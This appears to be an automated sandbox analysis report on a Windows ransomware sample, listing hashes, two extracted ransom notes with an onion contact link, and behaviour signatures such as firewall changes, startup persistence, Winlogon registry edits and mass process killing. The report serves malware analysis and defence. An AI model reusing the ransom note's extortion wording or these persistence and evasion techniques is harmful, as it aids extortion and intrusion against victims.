2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
64s
max time network
38s
platform
windows7_x64
resource
win7v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Size

290KB
MD5

a6dcf23059f6e61fa683907c47baf73e
SHA1

1d55396b26d97b18256513607dcbe3f308569d5b
SHA256

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3
SHA512

72ef9997b814807e677e7861a94de3c8c2b7cb350ab79c887de61f505f23ebc2e3db177b34e86f1dedb3017f468e5c6c0f34d188c574e4cbe20410ff1bf596f7

Score

10^/10

discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: P40rMDHNMpJJZpoBUoqJzoFVgJKfCw95Tfq8EyDXyuTUOWgtvXkGTzr+CGZHg3HEGh/ghbhTCMJBlb/Raup6yXnYismG2oDwbFE2qVTarverhMFFq6DWhbYFIlxASISDHulTlbA8lYMnC+pZhL3GTGZNsXbdZndvKJfmYT4pXBbWwDba+nOGPgSXnQUXBZ9iu4UBBKzED7vUvPlhzd6sOTvZuI/iD9i6rlnRf5P+lAUTI5TKk0SeX45YmIpPhDbGXR5rIOfBc+Q3uay1HvcXxUjSTYo7K3QR2Dv7AJ8jvbbFmK8fIzAXvTIA7/WEidHtmzrF0NKzjEJSiFuwNsXq9jy9lmheeFopQ+fP7vocIdsKvoAb6aoarSb2rXFHn69RxJRTPdeZaYhZHAM6CeuYfN0PYlylhYDnLKrB55Ut3eGakMiOWFGwLGMAwU3BAH33KlarikAjr67Hb5Cec3nw2q9vQyS4BevPgUAYo81RcHHBytj/rnSvEY5SNYu5skW/s/PATWLYV5m2mSyk+PtsBeYErXwfGycsZBUjmExmOs+2Kwj59rKTKNxDSAzjQSf3o0MAXODZe2+jecw4oso5l7HRyZiAZfSTfkDu3Qlkmcp5x8UHoU7PnepOu99sxS0vvmGkA1FBqKrYFW+a76RJ99EW8KUtRk5ZAzGWZTG2nGc=

URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: P40rMDHNMpJJZpoBUoqJzoFVgJKfCw95Tfq8EyDXyuTUOWgtvXkGTzr+CGZHg3HEGh/ghbhTCMJBlb/Raup6yXnYismG2oDwbFE2qVTarverhMFFq6DWhbYFIlxASISDHulTlbA8lYMnC+pZhL3GTGZNsXbdZndvKJfmYT4pXBbWwDba+nOGPgSXnQUXBZ9iu4UBBKzED7vUvPlhzd6sOTvZuI/iD9i6rlnRf5P+lAUTI5TKk0SeX45YmIpPhDbGXR5rIOfBc+Q3uay1HvcXxUjSTYo7K3QR2Dv7AJ8jvbbFmK8fIzAXvTIA7/WEidHtmzrF0NKzjEJSiFuwNsXq9jy9lmheeFopQ+fP7vocIdsKvoAb6aoarSb2rXFHn69RxJRTPdeZaYhZHAM6CeuYfN0PYlylhYDnLKrB55Ut3eGakMiOWFGwLGMAwU3BAH33KlarikAjr67Hb5Cec3nw2q9vQyS4BevPgUAYo81RcHHBytj/rnSvEY5SNYu5skW/s/PATWLYV5m2mSyk+PtsBeYErXwfGycsZBUjmExmOs+2Kwj59rKTKNxDSAzjQSf3o0MAXODZe2+jecw4oso5l7HRyZiAZfSTfkDu3Qlkmcp5x8UHoU7PnepOu99sxS0vvmGkA1FBqKrYFW+a76RJ99EW8KUtRk5ZAzGWZTG2nGc=

URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

628 cmd.exe

pid	process
628	cmd.exe

Drops startup file 1 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

1652 icacls.exe
1044 icacls.exe
888 icacls.exe

pid	process
1652	icacls.exe
1044	icacls.exe
888	icacls.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
752	taskkill.exe
1584	taskkill.exe
1956	taskkill.exe
1112	taskkill.exe
588	taskkill.exe
1600	taskkill.exe
2012	taskkill.exe
1748	taskkill.exe
884	taskkill.exe
1092	taskkill.exe
1228	taskkill.exe
1672	taskkill.exe
1136	taskkill.exe
764	taskkill.exe
1484	taskkill.exe
1192	taskkill.exe
488	taskkill.exe
1760	taskkill.exe
928	taskkill.exe
1924	taskkill.exe
1536	taskkill.exe
488	taskkill.exe
1100	taskkill.exe
1652	taskkill.exe
936	taskkill.exe
2016	taskkill.exe
1708	taskkill.exe
1388	taskkill.exe
368	taskkill.exe
1100	taskkill.exe
1608	taskkill.exe
1180	taskkill.exe
1088	taskkill.exe
1604	taskkill.exe
520	taskkill.exe
820	taskkill.exe
1696	taskkill.exe
1808	taskkill.exe
1096	taskkill.exe
1108	taskkill.exe
1688	taskkill.exe
1800	taskkill.exe
628	taskkill.exe
540	taskkill.exe
1940	taskkill.exe
348	taskkill.exe
540	taskkill.exe
936	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1176 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1636 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1176	reg.exe

pid	process
1636	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

pid	process
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exetaskkill.exetaskkill.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeicacls.execonhost.exetaskkill.execonhost.exetaskkill.execonhost.exetaskkill.exetaskkill.execonhost.exetaskkill.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	628	taskkill.exe
Token: SeDebugPrivilege	1388	conhost.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	368	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	1228	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	348	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeDebugPrivilege	928	taskkill.exe
Token: SeDebugPrivilege	1652	icacls.exe
Token: SeDebugPrivilege	752	conhost.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	1672	conhost.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	2012	conhost.exe
Token: SeDebugPrivilege	820	taskkill.exe
Token: SeDebugPrivilege	1136	taskkill.exe
Token: SeDebugPrivilege	1584	conhost.exe
Token: SeDebugPrivilege	936	taskkill.exe
Token: SeDebugPrivilege	1924	conhost.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	764	taskkill.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	488	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	1112	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	936	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	884	taskkill.exe
Token: SeDebugPrivilege	588	taskkill.exe
Token: SeDebugPrivilege	488	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	1324	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

pid	process
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

pid	process
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

description	pid	process	target process
PID 1612 wrote to memory of 1708	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe
PID 1612 wrote to memory of 1708	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe
PID 1612 wrote to memory of 1708	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe
PID 1612 wrote to memory of 664	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	reg.exe
PID 1612 wrote to memory of 664	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	reg.exe
PID 1612 wrote to memory of 664	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	reg.exe
PID 1612 wrote to memory of 1176	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	reg.exe
PID 1612 wrote to memory of 1176	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	reg.exe
PID 1612 wrote to memory of 1176	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	reg.exe
PID 1612 wrote to memory of 1104	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	schtasks.exe
PID 1612 wrote to memory of 1104	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	schtasks.exe
PID 1612 wrote to memory of 1104	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	schtasks.exe
PID 1612 wrote to memory of 972	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	cmd.exe
PID 1612 wrote to memory of 972	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	cmd.exe
PID 1612 wrote to memory of 972	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	cmd.exe
PID 1612 wrote to memory of 1476	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	netsh.exe
PID 1612 wrote to memory of 1476	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	netsh.exe
PID 1612 wrote to memory of 1476	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	netsh.exe
PID 1612 wrote to memory of 984	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	cmd.exe
PID 1612 wrote to memory of 984	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	cmd.exe
PID 1612 wrote to memory of 984	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	cmd.exe
PID 1612 wrote to memory of 960	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	netsh.exe
PID 1612 wrote to memory of 960	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	netsh.exe
PID 1612 wrote to memory of 960	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	netsh.exe
PID 1612 wrote to memory of 1180	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1180	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1180	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1164	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1164	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1164	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 888	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 888	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 888	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1608	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1608	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1608	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1324	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1324	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1324	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 772	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 772	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
